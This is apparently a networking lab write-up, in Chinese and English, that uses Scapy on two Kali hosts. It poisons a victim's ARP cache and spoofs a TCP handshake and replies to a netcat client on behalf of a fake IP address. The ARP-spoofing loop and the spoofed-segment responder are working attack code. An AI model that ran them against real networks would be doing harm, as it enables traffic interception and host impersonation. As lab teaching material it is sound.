Kali B中的命令:
nc 192.168.222.17 20030 -k
# peer: 192.168.222.17 is the spoofed address the Scapy responder on Kali A answers for;
#       the connection only reaches Kali A while the ARP poisoning below is running
# port: must equal listen_port in the responder script -- this line says 20030 while
#       the script below listens on 20037; use the same number in both places
# -k: keep the session open. NOTE(review): OpenBSD netcat only accepts -k together
#     with -l; check which nc Kali B ships (`nc -h`) before relying on this flag
阶段二:实施 ARP 欺骗 (主机 A - 终端 1)。下面的 send(..., loop=1, inter=1) 会每秒重发一次、直到 Ctrl-C 才停止,因此它要独占一个终端;后面的 Scapy 回答脚本在主机 A 的另一个终端中运行。
# Root is needed: the send()/sniff() calls below open raw sockets.
sudo scapy
在Scapy中:
# The host whose ARP cache we poison, and the address we claim to own.
target_ip = "192.168.222.133"
spoofed_ip = "192.168.222.17"
# Unsolicited ARP reply (op=2): "spoofed_ip is at <this host's MAC>".  hwsrc is
# left at Scapy's default, the MAC of the outgoing interface, so the victim
# starts sending frames for spoofed_ip to us.
poison = ARP(op=2, pdst=target_ip, psrc=spoofed_ip)
print(f"开始 ARP 欺骗: {spoofed_ip} is at My_MAC ...")
# Re-send once a second, forever (Ctrl-C to stop), so the poisoned entry is
# refreshed before the victim's cache expires it.
send(poison, inter=1, loop=1, verbose=0)
Kali A中的命令 (终端 2)。请先启动本脚本、再在 Kali B 上执行 nc:脚本只等待 30 秒的 SYN,超时即退出。
from scapy.all import *
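# ---- Configuration (edit to match the lab) -----------------------------------------
victim_ip = "192.168.222.133"  # host running nc; the only peer this script answers
ghost_ip = "192.168.222.17"    # IP we impersonate. It must NOT be bound on this host:
                               # a locally owned IP with no listening socket makes the
                               # kernel answer the SYN with RST before we can. The ARP
                               # poisoning (other terminal) steers the victim's frames
                               # for ghost_ip to this machine's NIC.
listen_port = 20037            # must equal the port nc connects to
initial_seq = 5000             # our ISN; a fixed value is fine for a lab

SYN_TIMEOUT = 30   # seconds to wait for the victim's SYN
DATA_TIMEOUT = 10  # seconds to wait for each data segment

# The two scripted rounds: (line printed while waiting, prefix printed in front of
# the received text, line printed after the bare ACK, payload we send back).
ROUNDS = (
    ("[对话] 等待nc的第一轮询问...", "[对话] 收到nc询问: ",
     "[对话] 已发送ACK确认收到询问", "Hello 17 I am A \n"),
    ("\n[对话] 等待nc的第二轮询问...", "[对话] 收到nc第二次询问: ",
     "[对话] 已发送ACK确认第二次询问", "FINE 17\n"),
)


def decode_payload(load: bytes) -> str:
    """Render a TCP payload for display: UTF-8, undecodable bytes dropped, whitespace stripped."""
    return load.decode("utf-8", errors="ignore").strip()


def build_segment(src_port: int, flags: str, seq: int, ack: int, payload=None):
    """Build one spoofed segment ghost_ip:listen_port -> victim_ip:src_port.

    `payload` (a str, if given) becomes the Raw layer as UTF-8 bytes; the caller
    must advance its sequence number by the *encoded* length, not len(str).
    """
    pkt = IP(src=ghost_ip, dst=victim_ip) / TCP(
        sport=listen_port, dport=src_port, flags=flags, seq=seq, ack=ack
    )
    if payload is not None:
        pkt = pkt / Raw(load=payload.encode("utf-8"))
    return pkt


def await_syn():
    """Wait up to SYN_TIMEOUT s for the victim's SYN; return it, or None on timeout.

    The filter pins the source to victim_ip: the SYN-ACK is always addressed to
    victim_ip, so a SYN from any other host must not be able to start the
    hand-shake (the original filter accepted SYNs from anywhere).
    """
    bpf = (
        f"tcp and src host {victim_ip} and dst host {ghost_ip} and dst port {listen_port} "
        f"and tcp[tcpflags] & tcp-syn != 0"
    )
    pkts = sniff(filter=bpf, count=1, timeout=SYN_TIMEOUT)
    return pkts[0] if pkts else None


def await_data(src_port: int):
    """Wait up to DATA_TIMEOUT s for the next pushed data segment on this connection.

    Returns the packet, or None if nothing arrived or the segment carries no
    payload. NOTE(review): matching on PSH mirrors the original script; a sender
    may omit PSH on some segments, which this filter would then miss.
    """
    bpf = (
        f"tcp and src host {victim_ip} and src port {src_port} and dst host {ghost_ip} "
        f"and dst port {listen_port} and tcp[tcpflags] & tcp-push != 0"
    )
    pkts = sniff(filter=bpf, count=1, timeout=DATA_TIMEOUT)
    if not pkts or Raw not in pkts[0]:
        return None
    return pkts[0]


def main() -> None:
    """Passive responder: one spoofed hand-shake, then the two scripted rounds.

    Every timeout now ends the run with a message instead of an IndexError on
    an empty sniff() result.
    """
    print(f"=== Scapy 被动回答方 ===\n监听端口: {listen_port}")
    print(f"伪装IP: {ghost_ip}")
    print("等待nc连接...\n" + "=" * 40)

    # -- Phase 1: the victim's SYN ---------------------------------------------
    print("[被动] 等待nc的SYN连接请求...")
    syn_pkt = await_syn()
    if syn_pkt is None:
        print(f"[timeout] no SYN from {victim_ip} within {SYN_TIMEOUT}s; giving up")
        return
    src_port = syn_pkt[TCP].sport  # victim's ephemeral port, constant for the whole session
    print(f"[被动] 收到来自 {victim_ip}:{src_port} 的SYN请求")
    print(f"[被动] nc的序列号: {syn_pkt[TCP].seq}")

    # -- Phase 2: SYN-ACK ------------------------------------------------------
    my_ack = syn_pkt[TCP].seq + 1  # the victim's SYN occupies one sequence number
    send(build_segment(src_port, "SA", initial_seq, my_ack))
    my_seq = initial_seq + 1       # so does our own SYN
    print(f"[状态] 我方seq={my_seq}, 我方ack={my_ack}")
    # The third-handshake ACK is deliberately not awaited: the next sniff picks
    # up the victim's first data segment, which carries that ACK anyway.

    # -- Phase 3: scripted request/reply rounds --------------------------------
    print("\n" + "=" * 40)
    for wait_msg, recv_prefix, ack_msg, reply in ROUNDS:
        print(wait_msg)
        pkt = await_data(src_port)
        if pkt is None:
            print(f"[timeout] no data from {victim_ip}:{src_port} within {DATA_TIMEOUT}s; giving up")
            return
        payload = pkt[Raw].load
        print(f"{recv_prefix}{decode_payload(payload)}")
        my_ack = pkt[TCP].seq + len(payload)  # acknowledge every byte just received
        # Bare ACK first (as the original did), then the data segment, which
        # repeats the same ack number.
        send(build_segment(src_port, "A", my_seq, my_ack))
        print(ack_msg)
        send(build_segment(src_port, "PA", my_seq, my_ack, reply))
        print(f"[对话] 已回复: {reply.strip()}")
        my_seq += len(reply.encode("utf-8"))  # advance by bytes on the wire, not characters
    # NOTE(review): the connection is never closed (no FIN); the victim's nc
    # stays connected and any further input from it goes unanswered.


if __name__ == "__main__":
    main()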
测试
_